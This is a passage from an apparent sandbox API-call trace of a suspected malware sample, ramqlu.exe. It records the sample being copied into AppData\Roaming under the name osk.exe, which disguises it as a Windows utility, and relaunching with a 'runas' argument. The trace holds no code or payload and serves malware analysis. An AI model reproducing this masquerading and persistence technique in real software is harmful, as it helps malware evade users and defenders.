_MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0057.621] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", 
_MaxCount=0x7) returned -16 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.622] GetProcessHeap () returned 0x350000 [0057.622] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351298 | out: hHeap=0x350000) returned 1 [0057.622] GetProcessHeap () returned 0x350000 [0057.622] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x18) returned 0x351298 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) 
returned -5 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0057.622] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 
[0057.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.623] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0057.623] GetProcessHeap () returned 0x350000 [0057.623] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351298 | out: hHeap=0x350000) returned 1 [0057.623] GetProcessHeap () returned 0x350000 [0057.623] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x1c4) returned 0x3632d8 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3632d8, Size=0xe8) returned 0x3632d8 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3632d8) returned 0xe8 [0057.624] _wcsnicmp (_String1="/y", _String2="/Y", _MaxCount=0x2) returned 0 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x3633c8 [0057.624] GetProcessHeap () returned 0x350000 [0057.624] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x258) returned 0x363400 [0057.624] _wcsicmp (_String1="ramqlu.exe", _String2=".") returned 68 [0057.624] _wcsicmp (_String1="ramqlu.exe", _String2="..") returned 68 [0057.624] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x20 [0057.624] GetProcessHeap () returned 0x350000 [0057.625] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2c) returned 0x363660 [0057.625] GetProcessHeap () returned 0x350000 [0057.625] RtlAllocateHeap 
(HeapHandle=0x350000, Flags=0x8, Size=0x258) returned 0x3641f0 [0057.625] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0057.625] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 [0057.625] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x26f5e0, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x26f5e0, ReturnLength=0x0) returned 0x0 [0057.625] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x26f5e8, ProcessInformationLength=0x4) returned 0x0 [0057.625] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0057.625] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", fInfoLevelId=0x1, lpFindFileData=0x363408, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x363408) returned 0x363698 [0057.625] GetProcessHeap () returned 0x350000 [0057.625] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x14) returned 0x351298 [0057.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x26e900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0057.627] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="con") returned -53 [0057.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26eaec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x78 [0057.627] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0057.627] _get_osfhandle (_FileHandle=3) returned 0x78 [0057.627] GetFileType (hFile=0x78) returned 0x1 [0057.627] 
SetErrorMode (uMode=0x0) returned 0x0 [0057.627] SetErrorMode (uMode=0x1) returned 0x0 [0057.627] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", nBufferLength=0x208, lpBuffer=0x26eda0, lpFilePart=0x26eb24 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", lpFilePart=0x26eb24*="ramqlu.exe") returned 0x30 [0057.627] SetErrorMode (uMode=0x0) returned 0x1 [0057.627] _get_osfhandle (_FileHandle=3) returned 0x78 [0057.627] ReadFile (in: hFile=0x78, lpBuffer=0x150000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26eb90, lpOverlapped=0x0 | out: lpBuffer=0x150000*, lpNumberOfBytesRead=0x26eb90*=0x200, lpOverlapped=0x0) returned 1 [0057.628] SetErrorMode (uMode=0x0) returned 0x0 [0057.628] SetErrorMode (uMode=0x1) returned 0x0 [0057.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x26e700, lpFilePart=0x26e6f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x26e6f8*="osk.exe") returned 0x35 [0057.628] SetErrorMode (uMode=0x0) returned 0x1 [0057.628] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0057.629] GetProcessHeap () returned 0x350000 [0057.629] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x258) returned 0x364450 [0057.629] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0057.629] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 [0057.629] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0057.629] GetLastError () returned 0x2 [0057.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x26e900, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0057.629] SetErrorMode (uMode=0x0) returned 0x0 [0057.629] SetErrorMode (uMode=0x1) returned 0x0 [0057.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x26e700, lpFilePart=0x26e6f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x26e6f8*="osk.exe") returned 0x35 [0057.629] SetErrorMode (uMode=0x0) returned 0x1 [0057.629] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0057.629] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0057.629] CopyFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x4abe41b4, dwCopyFlags=0x0) returned 1 [0057.644] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x2020 [0057.645] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", dwFileAttributes=0x2020) returned 1 [0057.645] _close (_FileHandle=3) returned 0 [0057.645] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0057.645] GetFileType (hFile=0xffffffff) returned 0x0 [0057.645] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0057.645] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x26eb34) returned 0 
[0057.645] FindNextFileW (in: hFindFile=0x363698, lpFindFileData=0x363408 | out: lpFindFileData=0x363408*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10f3e80, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xd10f3e80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ramqlu.exe", cAlternateFileName="")) returned 0 [0057.645] GetLastError () returned 0x12 [0057.645] FindClose (in: hFindFile=0x363698 | out: hFindFile=0x363698) returned 1 [0057.646] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x26f5e0, ProcessInformationLength=0x4) returned 0x0 [0057.646] _vsnwprintf (in: _Buffer=0x4abe5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26f5bc | out: _Buffer=" 1") returned 9 [0057.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.646] GetFileType (hFile=0x7) returned 0x2 [0057.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0057.646] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f548 | out: lpMode=0x26f548) returned 1 [0057.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.646] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26f57c | out: lpConsoleScreenBufferInfo=0x26f57c) returned 1 [0057.647] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4abf4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0057.648] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4abf4640, nSize=0x2000, Arguments=0x26f5bc | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0057.648] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4abf4640*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x26f5a0, lpReserved=0x0 | out: lpBuffer=0x4abf4640*, 
lpNumberOfCharsWritten=0x26f5a0*=0x1b) returned 1 [0057.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.649] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.649] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4abe41ac | out: lpMode=0x4abe41ac) returned 1 [0057.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.649] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4abe41b0 | out: lpMode=0x4abe41b0) returned 1 [0057.650] SetConsoleInputExeNameW () returned 0x1 [0057.650] GetConsoleOutputCP () returned 0x1b5 [0057.650] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abe4260 | out: lpCPInfo=0x4abe4260) returned 1 [0057.650] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.650] exit (_Code=0) Process: id = "3" image_name = "ramqlu.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe" page_root = "0x480bb000" os_pid = "0x7c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x4e4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x5d4 [0057.922] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0057.923] GetKeyboardType (nTypeFlag=0) returned 4 [0057.923] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0057.923] GetStartupInfoA (in: lpStartupInfo=0x18fef8 | out: lpStartupInfo=0x18fef8*(cb=0x44, 
lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0057.923] GetACP () returned 0x4e4 [0057.923] GetCurrentThreadId () returned 0x5d4 [0057.924] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18ede8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0057.937] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ecc3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0057.937] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0057.937] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0057.937] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0057.938] lstrcpynA (in: lpString1=0x18ecc3, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" [0057.938] GetThreadLocale () returned 0x409 [0057.938] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18edd3, cchData=5 | out: lpLCData="ENU") returned 4 [0057.968] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned 48 
[0057.968] lstrcpynA (in: lpString1=0x18ecf0, lpString2="ENU", iMaxLength=216 | out: lpString1="ENU") returned="ENU" [0057.968] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0057.968] lstrcpynA (in: lpString1=0x18ecf0, lpString2="EN", iMaxLength=216 | out: lpString1="EN") returned="EN" [0057.968] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0057.968] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.968] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffda, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe8, 
lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: 
lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.969] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c70000 [0057.970] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.970] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0057.970] GetVersionExA (in: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4, dwMinorVersion=0x140000, dwBuildNumber=0x18fec4, dwPlatformId=0x76c1e37d, szCSDVersion="ÿÿÿÿ") | out: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.970] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0057.971] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0057.971] GetThreadLocale () returned 0x409 [0057.971] GetSystemMetrics (nIndex=42) returned 0 [0057.977] GetThreadLocale () returned 0x409 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jan") returned 4 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd74, cchData=256 | out: lpLCData="January") returned 8 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Feb") returned 4 [0057.977] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd74, cchData=256 | out: lpLCData="February") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mar") returned 4 
[0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="March") returned 6 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Apr") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="April") returned 6 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jun") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, 